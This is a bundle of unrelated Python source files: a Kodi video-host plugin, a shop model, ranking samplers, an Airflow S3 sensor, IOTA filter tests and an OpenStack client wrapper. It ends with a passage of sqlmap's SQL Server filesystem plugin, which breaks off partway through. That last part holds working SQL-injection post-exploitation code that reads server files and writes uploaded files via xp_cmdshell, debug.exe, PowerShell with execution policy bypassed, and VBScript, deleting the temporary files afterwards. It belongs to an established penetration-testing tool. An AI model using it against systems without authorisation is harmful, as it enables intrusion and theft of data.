#ENABLED_HOSTS = ("iframe", "kodik", "videocdn", "hdvb", "collaps")
ENABLED_HOSTS = ("hdvb", "collaps")
_kp_id_ = ''
def prepare_url(host, url):
if not url:
return ""
#response = tools.get_response(url, HEADERS2, {}, 'GET')
#if response:
# return common.parseDOM(response, "iframe", ret="src")[0]
#else:
return url
def get_add_info(translate, quality):
result = ""
if (not translate):
translate = ""
if (not quality):
quality = ""
if ((translate != "") or (quality != "")):
result = "({0})"
result = result.format((translate if (translate != "") else "") + (("," + quality) if (quality != "") else ""))
return result
def get_content():
vh_title = "yohoho."
list_li = []
VALUES["kinopoisk"] = _kp_id_
response = tools.get_response(URL, HEADERS, VALUES, 'POST')
#{"moonwalk":{},
#"hdgo":{},
#"trailer":{},
#"torrent":{},
#"videospider":{},
#"kodik":{},
#"videocdn":{"iframe":"//90.tvmovies.in/kLShoChnGWEE/movie/107","translate":"Полное дублирование","quality":"hddvd"},
#"hdvb":{"iframe":"https://vid1572801764.farsihd.pw/movie/db8f575a1374728dda63eb6244be9bca/iframe","translate":"многоголосый закадровый","quality":"HDRip"},
#"iframe":{"iframe":"https://videoframe.at/movie/42da420pb7p/iframe","translate":"","quality":""},
#"collaps":{"iframe":"https://api1572798262.buildplayer.com/embed/movie/334","translate":"","quality":""}}
if response:
jdata = json.loads(response)
for host in ENABLED_HOSTS:
host_data = jdata[host]
if host_data:
iframe = host_data["iframe"]
translate = host_data["translate"]
quality = host_data["quality"]
title_ = "*T*"
title = "[COLOR=orange][{0}][/COLOR] {1} {2}".format(vh_title + host, tools.encode(title_), get_add_info(translate, quality))
uri = sys.argv[0] + "?mode=show&url={0}".format(urllib.quote_plus(prepare_url(host, iframe)))
item = xbmcgui.ListItem(title)
list_li.append([uri, item, True])
return list_li
def process(kp_id):
global _kp_id_
_kp_id_ = kp_id
xbmc.log("yohoho:kp_id=" + kp_id)
list_li = []
try:
list_li = get_content()
except:
pass
return list_li
|
"""
byceps.services.shop.sequence.models
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from sqlalchemy.ext.hybrid import hybrid_property
from ....database import db
from ....util.instances import ReprBuilder
from ..shop.transfer.models import ShopID
from .transfer.models import Purpose
class NumberSequence(db.Model):
"""A shop-specific integer sequence for a purpose."""
__tablename__ = 'shop_sequences'
shop_id = db.Column(db.UnicodeText, db.ForeignKey('shops.id'), primary_key=True)
_purpose = db.Column('purpose', db.UnicodeText, primary_key=True)
prefix = db.Column(db.UnicodeText, unique=True, nullable=False)
value = db.Column(db.Integer, default=0, nullable=False)
def __init__(self, shop_id: ShopID, purpose: Purpose, prefix: str) -> None:
self.shop_id = shop_id
self.purpose = purpose
self.prefix = prefix
@hybrid_property
def purpose(self) -> Purpose:
return Purpose[self._purpose]
@purpose.setter
def purpose(self, purpose: Purpose) -> None:
assert purpose is not None
self._purpose = purpose.name
def __repr__(self) -> str:
return ReprBuilder(self) \
.add('shop', self.shop_id) \
.add('purpose', self.purpose.name) \
.add_with_lookup('prefix') \
.add_with_lookup('value') \
.build()
|
"""[rim.py]
Copyright (c) 2014, Andrew Perrault, Joanna Drummond
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import numpy
import random
import sys
def rim_sample(ref_ranking, parameters, debug=False):
sample = []
sample.append(ref_ranking[0])
for i in range(1, len(ref_ranking)):
sample.insert(numpy.nonzero(
numpy.random.multinomial(n=1, pvals=parameters[i]))[0],
ref_ranking[i])
return sample
def gen_dispersion_list(ref_ranking, dispersion, debug=False):
print "generating dispersion list, finished: ",
sys.stdout.flush()
parameters = {}
if dispersion == 0:
return ref_ranking
# have to translate to one-based indexing for the probabilities
for i in range(2, len(ref_ranking) + 1):
if i % 100 == 0:
print i,
sys.stdout.flush()
sample_prob = numpy.zeros(i)
for j in range(1, i + 1):
if dispersion == 1:
sample_prob[j - 1] = 1.0 / i
else:
sample_prob[j - 1] = (dispersion ** (i - j) *
(1 - dispersion) / (1 - dispersion ** i))
if debug:
assert sum(sample_prob) == 1
parameters[i - 1] = sample_prob
print "finished generating."
return parameters
def mallows_sample(ref_ranking, dispersion_list, debug=False):
return rim_sample(ref_ranking=ref_ranking, parameters=dispersion_list, debug=debug)
def mallows_sample_only_phi(ref_ranking, dispersion, debug=False):
parameters = {}
if dispersion == 0:
return ref_ranking
# have to translate to one-based indexing for the probabilities
for i in range(2, len(ref_ranking) + 1):
sample_prob = numpy.zeros(i)
for j in range(1, i + 1):
if dispersion == 1:
sample_prob[j - 1] = 1.0 / i
else:
sample_prob[j - 1] = (dispersion ** (i - j) *
(1 - dispersion) / (1 - dispersion ** i))
if debug:
assert sum(sample_prob) == 1
parameters[i - 1] = sample_prob
return rim_sample(ref_ranking=ref_ranking,
parameters=parameters, debug=debug)
def riffle_sample(ranking1, ranking2, sigma, debug=False):
sample = []
r1copy = list(ranking1)
r2copy = list(ranking2)
r1copy.reverse()
r2copy.reverse()
mixing_probability = max(min(random.gauss(0.25, sigma) if random.randint(0, 1)
else random.gauss(0.75, sigma), 1.0), 0.0)
for i in range(len(r1copy) + len(r2copy)):
if len(r1copy) == 0 and len(r2copy) == 0:
raise Exception('problem')
if len(r1copy) == 0:
sample.append(r2copy.pop())
continue
if len(r2copy) == 0 or random.random() <= mixing_probability:
sample.append(r1copy.pop())
continue
sample.append(r2copy.pop())
return sample
def plackett_luce_sample(parameters, ranking_length):
ranking = []
parameters = parameters / numpy.sum(parameters)
assert(ranking_length <= len(parameters))
while len(ranking) < ranking_length:
sampled = numpy.nonzero(numpy.random.multinomial(n=1, pvals=parameters))[0][0]
ranking.append(sampled)
sampled_prob = parameters[sampled]
parameters[sampled] = 0.
if numpy.sum(parameters) == 0.:
continue
parameters = parameters / (1 - sampled_prob)
return ranking
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from urllib.parse import urlparse
from airflow.exceptions import AirflowException
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
class S3KeySensor(BaseSensorOperator):
"""
Waits for a key (a file-like instance on S3) to be present in a S3 bucket.
S3 being a key/value it does not support folders. The path is just a key
a resource.
:param bucket_key: The key being waited on. Supports full s3:// style url
or relative path from root level. When it's specified as a full s3://
url, please leave bucket_name as `None`.
:type bucket_key: str
:param bucket_name: Name of the S3 bucket. Only needed when ``bucket_key``
is not provided as a full s3:// url.
:type bucket_name: str
:param wildcard_match: whether the bucket_key should be interpreted as a
Unix wildcard pattern
:type wildcard_match: bool
:param aws_conn_id: a reference to the s3 connection
:type aws_conn_id: str
:param verify: Whether or not to verify SSL certificates for S3 connection.
By default SSL certificates are verified.
You can provide the following values:
- ``False``: do not validate SSL certificates. SSL will still be used
(unless use_ssl is False), but SSL certificates will not be
verified.
- ``path/to/cert/bundle.pem``: A filename of the CA cert bundle to uses.
You can specify this argument if you want to use a different
CA cert bundle than the one used by botocore.
:type verify: bool or str
"""
template_fields = ('bucket_key', 'bucket_name')
@apply_defaults
def __init__(self,
bucket_key,
bucket_name=None,
wildcard_match=False,
aws_conn_id='aws_default',
verify=None,
*args,
**kwargs):
super().__init__(*args, **kwargs)
# Parse
if bucket_name is None:
parsed_url = urlparse(bucket_key)
if parsed_url.netloc == '':
raise AirflowException('Please provide a bucket_name')
else:
bucket_name = parsed_url.netloc
bucket_key = parsed_url.path.lstrip('/')
else:
parsed_url = urlparse(bucket_key)
if parsed_url.scheme != '' or parsed_url.netloc != '':
raise AirflowException('If bucket_name is provided, bucket_key' +
' should be relative path from root' +
' level, rather than a full s3:// url')
self.bucket_name = bucket_name
self.bucket_key = bucket_key
self.wildcard_match = wildcard_match
self.aws_conn_id = aws_conn_id
self.verify = verify
def poke(self, context):
from airflow.providers.amazon.aws.hooks.s3 import S3Hook
hook = S3Hook(aws_conn_id=self.aws_conn_id, verify=self.verify)
self.log.info('Poking for key : s3://%s/%s', self.bucket_name, self.bucket_key)
if self.wildcard_match:
return hook.check_for_wildcard_key(self.bucket_key,
self.bucket_name)
return hook.check_for_key(self.bucket_key, self.bucket_name)
|
import filters as f
from filters.test import BaseFilterTestCase
from iota import Address, TransactionHash, TryteString
from iota.filters import AddressNoChecksum, GeneratedAddress, NodeUri, Trytes
class GeneratedAddressTestCase(BaseFilterTestCase):
filter_type = GeneratedAddress
def test_pass_none(self):
"""
``None`` always passes this filter.
Use ``Required | GeneratedAddress`` to reject null values.
"""
self.assertFilterPasses(None)
def test_pass_happy_path(self):
"""
Incoming value has correct type and attributes.
"""
self.assertFilterPasses(Address(b'', key_index=42, security_level=2))
def test_fail_key_index_null(self):
"""
Incoming value does not have ``key_index`` set.
"""
self.assertFilterErrors(
Address(b'', security_level=2),
[GeneratedAddress.CODE_NO_KEY_INDEX],
)
def test_fail_security_level_null(self):
"""
Incoming value does not have ``security_level`` set.
"""
self.assertFilterErrors(
Address(b'', key_index=2),
[GeneratedAddress.CODE_NO_SECURITY_LEVEL],
)
def test_fail_wrong_type(self):
"""
Incoming value is not an :py:class:`Address` instance.
"""
self.assertFilterErrors(
# The only way to ensure ``key_index`` is set is to require that
# the incoming value is an :py:class:`Address` instance.
b'TESTVALUE9DONTUSEINPRODUCTION99999WJ9PCA'
b'RBOSBIMNTGDYKUDYYFJFGZOHORYSQPCWJRKHIOVIY',
[f.Type.CODE_WRONG_TYPE],
)
class NodeUriTestCase(BaseFilterTestCase):
filter_type = NodeUri
def test_pass_none(self):
"""
``None`` always passes this filter.
Use ``Required | NodeUri`` to reject null values.
"""
self.assertFilterPasses(None)
def test_pass_udp(self):
"""
The incoming value is a valid UDP URI.
"""
self.assertFilterPasses('udp://localhost:14265/node')
def test_pass_tcp(self):
"""
The incoming value is a valid TCP URI.
https://github.com/iotaledger/iota.py/issues/111
"""
self.assertFilterPasses('tcp://localhost:14265/node')
def test_fail_not_a_uri(self):
"""
The incoming value is not a URI.
Note: Internally, the filter uses ``resolve_adapter``, which has its
own unit tests. We won't duplicate them here; a simple smoke
check should suffice.
References:
- :py:class:`test.adapter_test.ResolveAdapterTestCase`
"""
self.assertFilterErrors(
'not a valid uri',
[NodeUri.CODE_NOT_NODE_URI],
)
def test_fail_bytes(self):
"""
To ensure consistent behavior in Python 2 and 3, bytes are not
accepted.
"""
self.assertFilterErrors(
b'udp://localhost:14265/node',
[f.Type.CODE_WRONG_TYPE],
)
def test_fail_wrong_type(self):
"""
The incoming value is not a string.
"""
self.assertFilterErrors(
# Use ``FilterRepeater(NodeUri)`` to validate a sequence of URIs.
['udp://localhost:14265/node'],
[f.Type.CODE_WRONG_TYPE],
)
class TrytesTestCase(BaseFilterTestCase):
filter_type = Trytes
def test_pass_none(self):
"""
``None`` always passes this filter.
Use ``Required | Trytes`` to reject null values.
"""
self.assertFilterPasses(None)
def test_pass_ascii(self):
"""
The incoming value is ASCII.
"""
trytes = b'RBTC9D9DCDQAEASBYBCCKBFA'
filter_ = self._filter(trytes)
self.assertFilterPasses(filter_, trytes)
self.assertIsInstance(filter_.cleaned_data, TryteString)
def test_pass_bytearray(self):
"""
The incoming value is a bytearray.
"""
trytes = bytearray(b'RBTC9D9DCDQAEASBYBCCKBFA')
filter_ = self._filter(trytes)
self.assertFilterPasses(filter_, trytes)
self.assertIsInstance(filter_.cleaned_data, TryteString)
def test_pass_tryte_string(self):
"""
The incoming value is a TryteString.
"""
trytes = TryteString(b'RBTC9D9DCDQAEASBYBCCKBFA')
filter_ = self._filter(trytes)
self.assertFilterPasses(filter_, trytes)
self.assertIsInstance(filter_.cleaned_data, TryteString)
def test_pass_alternate_result_type(self):
"""
Configuring the filter to return a specific type.
"""
input_trytes = b'RBTC9D9DCDQAEASBYBCCKBFA'
result_trytes = (
b'RBTC9D9DCDQAEASBYBCCKBFA9999999999999999'
b'99999999999999999999999999999999999999999'
)
filter_ = self._filter(input_trytes, result_type=TransactionHash)
self.assertFilterPasses(filter_, result_trytes)
self.assertIsInstance(filter_.cleaned_data, TransactionHash)
def test_fail_not_trytes(self):
"""
The incoming value contains an invalid character.
Note: Internally, the filter uses :py:class:`TryteString`, which has
its own unit tests. We won't duplicate them here; a simple smoke
check should suffice.
References:
- :py:class:`test.types_test.TryteStringTestCase`
"""
self.assertFilterErrors(
# Everyone knows there's no such thing as "8"!
b'RBTC9D9DCDQAEASBYBCCKBFA8',
[Trytes.CODE_NOT_TRYTES],
)
def test_fail_alternate_result_type(self):
"""
The incoming value is a valid tryte sequence, but the filter is
configured for a specific type with stricter validation.
"""
trytes = (
# Ooh, just a little bit too long there.
b'RBTC9D9DCDQAEASBYBCCKBFA99999999999999999'
b'99999999999999999999999999999999999999999'
)
self.assertFilterErrors(
self._filter(trytes, result_type=TransactionHash),
[Trytes.CODE_WRONG_FORMAT],
)
def test_fail_wrong_type(self):
"""
The incoming value has an incompatible type.
"""
self.assertFilterErrors(
# Use ``FilterRepeater(Trytes)`` to validate a sequence of tryte
# representations.
[TryteString(b'RBTC9D9DCDQAEASBYBCCKBFA')],
[f.Type.CODE_WRONG_TYPE],
)
class AddressNoChecksumTestCase(BaseFilterTestCase):
filter_type = AddressNoChecksum
def setUp(self):
super(AddressNoChecksumTestCase, self).setUp()
# Define some addresses that we can reuse between tests
self.tryte1 = (
b'TESTVALUE9DONTUSEINPRODUCTION99999FBFFTG'
b'QFWEHEL9KCAFXBJBXGE9HID9XCOHFIDABHDG9AHDR'
)
self.checksum = b'ENXYJOBP9'
self.address = Address(self.tryte1)
self.address_with_checksum = Address(self.tryte1 + self.checksum)
self.address_with_bad_checksum = Address(self.tryte1 + b'DEADBEEF9')
def test_pass_no_checksum_addy(self):
"""
Incoming value is tryte in address form or Address object.
"""
self.assertFilterPasses(self.tryte1)
self.assertFilterPasses(self.address)
def test_pass_with_checksum_addy(self):
"""
After passing through the filter an address with a checksum should
return the address without.
"""
self.assertFilterPasses(self.address_with_checksum, self.address)
def test_fail_with_bad_checksum_addy(self):
"""
If they've got a bad checksum in their address we should probably
tell them, so they don't wonder why something works in one place and
not another.
"""
self.assertFilterErrors(
self.address_with_bad_checksum,
[AddressNoChecksum.ADDRESS_BAD_CHECKSUM])
|
import urlparse
try:
from keystoneclient.v2_0 import client as keystone_client
#from glance import client as glance_client
import glanceclient
from novaclient.v1_1 import client as nova_client
from neutronclient.v2_0 import client as quantum_client
has_openstack = True
except:
has_openstack = False
from xos.config import Config
def require_enabled(callable):
def wrapper(*args, **kwds):
if has_openstack:
return callable(*args, **kwds)
else:
return None
return wrapper
def parse_novarc(filename):
opts = {}
f = open(filename, 'r')
for line in f:
try:
line = line.replace('export', '').strip()
parts = line.split('=')
if len(parts) > 1:
value = parts[1].replace("\'", "")
value = value.replace('\"', '')
opts[parts[0]] = value
except:
pass
f.close()
return opts
class Client:
def __init__(self, username=None, password=None, tenant=None, url=None, token=None, endpoint=None, controller=None, cacert=None, admin=True, *args, **kwds):
self.has_openstack = has_openstack
self.url = controller.auth_url
if admin:
self.username = controller.admin_user
self.password = controller.admin_password
self.tenant = controller.admin_tenant
else:
self.username = None
self.password = None
self.tenant = None
if username:
self.username = username
if password:
self.password = password
if tenant:
self.tenant = tenant
if url:
self.url = url
if token:
self.token = token
if endpoint:
self.endpoint = endpoint
self.cacert = cacert
#if '@' in self.username:
# self.username = self.username[:self.username.index('@')]
class KeystoneClient(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = keystone_client.Client(username=self.username,
password=self.password,
tenant_name=self.tenant,
auth_url=self.url
)
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class Glance(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = glanceclient.get_client(host='0.0.0.0',
username=self.username,
password=self.password,
tenant=self.tenant,
auth_url=self.url)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class GlanceClient(Client):
def __init__(self, version, endpoint, token, cacert=None, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = glanceclient.Client(version,
endpoint=endpoint,
token=token,
cacert=cacert
)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class NovaClient(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = nova_client.Client(username=self.username,
api_key=self.password,
project_id=self.tenant,
auth_url=self.url,
region_name='',
extensions=[],
service_type='compute',
service_name='',
)
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class NovaDB(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.ctx = get_admin_context()
nova_db_api.FLAGS(default_config_files=['/etc/nova/nova.conf'])
self.client = nova_db_api
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class QuantumClient(Client):
def __init__(self, *args, **kwds):
Client.__init__(self, *args, **kwds)
if has_openstack:
self.client = quantum_client.Client(username=self.username,
password=self.password,
tenant_name=self.tenant,
auth_url=self.url,
ca_cert=self.cacert)
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def __getattr__(self, name):
return getattr(self.client, name)
class OpenStackClient:
"""
A simple native shell to the openstack backend services.
This class can receive all nova calls to the underlying testbed
"""
def __init__ ( self, *args, **kwds) :
# instantiate managers
self.keystone = KeystoneClient(*args, **kwds)
url_parsed = urlparse.urlparse(self.keystone.url)
hostname = url_parsed.netloc.split(':')[0]
token = self.keystone.client.tokens.authenticate(username=self.keystone.username, password=self.keystone.password, tenant_name=self.keystone.tenant)
glance_endpoint = self.keystone.service_catalog.url_for(service_type='image', endpoint_type='publicURL')
self.glanceclient = GlanceClient('1', endpoint=glance_endpoint, token=token.id, **kwds)
self.nova = NovaClient(*args, **kwds)
# self.nova_db = NovaDB(*args, **kwds)
self.quantum = QuantumClient(*args, **kwds)
@require_enabled
def connect(self, *args, **kwds):
self.__init__(*args, **kwds)
@require_enabled
def authenticate(self):
return self.keystone.authenticate()
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import ntpath
import os
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.convert import base64encode
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def _dataToScr(self, fileContent, chunkName):
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = ""
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = hexencode(lineChar)
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar)
else:
scrString += " %s" % strLineChar
lineAddr += len(lineChar)
fileLines.append(scrString)
fileLines.append("w")
fileLines.append("q")
return fileLines
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
return chunkName
def stackedReadFile(self, rFile):
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%shex" % self.fileTblName
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % rFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
# Reference: http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
DECLARE @length INT
DECLARE @chunk INT
SET @charset = '0123456789ABCDEF'
SET @counter = 1
SET @hexstr = ''
SET @length = (SELECT DATALENGTH(%s) FROM %s)
SET @chunk = 1024
WHILE (@counter <= @length)
BEGIN
DECLARE @tempint INT
DECLARE @firstint INT
DECLARE @secondint INT
SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
SET @firstint = floor(@tempint/16)
SET @secondint = @tempint - (@firstint * 16)
SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
SET @counter = @counter + 1
IF @counter %% @chunk = 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
SET @hexstr = ''
END
END
IF @counter %% (@chunk) != 0
BEGIN
INSERT INTO %s(%s) VALUES(@hexstr)
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count)
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl)
return result
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s'" % dFile
logger.info(infoMsg)
encodedFileContent = base64encode(wFileContent)
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File)
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
randPSScriptPath = "%s\%s" % (tmpPath, randPSScript)
wFileSize = len(encodedFileContent)
chunkMaxSize = 1024
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
for i in xrange(0, wFileSize, chunkMaxSize):
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile
logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)
commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % encodedBase64FilePath,
"del /F /Q \"%s\"" % randPSScriptPath)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile
logger.info(infoMsg)
dFileName = ntpath.basename(dFile)
sFile = "%s\%s" % (tmpPath, dFileName)
wFileSize = os.path.getsize(wFile)
debugSize = 0xFF00
if wFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath)
debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
debugMsg += "it chunk by chunk and recreate the original file "
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
for i in xrange(0, wFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(wFileChunk, tmpPath)
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName)
else:
debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s"
outputFilePath = "%s"
Set fs = CreateObject("Scripting.FileSystemObject")
Set file = fs.GetFile(inputFilePath)
If file.Size Then
Wscript.Echo "Loading from: " & inputFilePath
Wscript.Echo
Set fd = fs.OpenTextFile(inputFilePath, 1)
data = fd.ReadAll
fd.Close
data = Replace(data, " ", "")
data = Replace(data, vbCr, "")
data = Replace(data, vbLf, "")
Wscript.Echo "Fixed Input: "
Wscript.Echo data
Wscript.Echo
decodedData = base64_decode(data)
Wscript.Echo "Output: "
Wscript.Echo decodedData
Wscript.Echo
Wscript.Echo "Writing output in: " & outputFilePath
Wscript.Echo
Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
ofs.Write decodedData
ofs.close
Else
Wscript.Echo "The file is empty."
End If
Function base64_decode(byVal strIn)
Dim w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 4
w1 = mimedecode(Mid(strIn, n, 1))
w2 = mimedecode(Mid(strIn, n + 1, 1))
w3 = mimedecode(Mid(strIn, n + 2, 1))
w4 = mimedecode(Mid(strIn, n + 3, 1))
If Not w2 Then _
strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
If Not w3 Then _
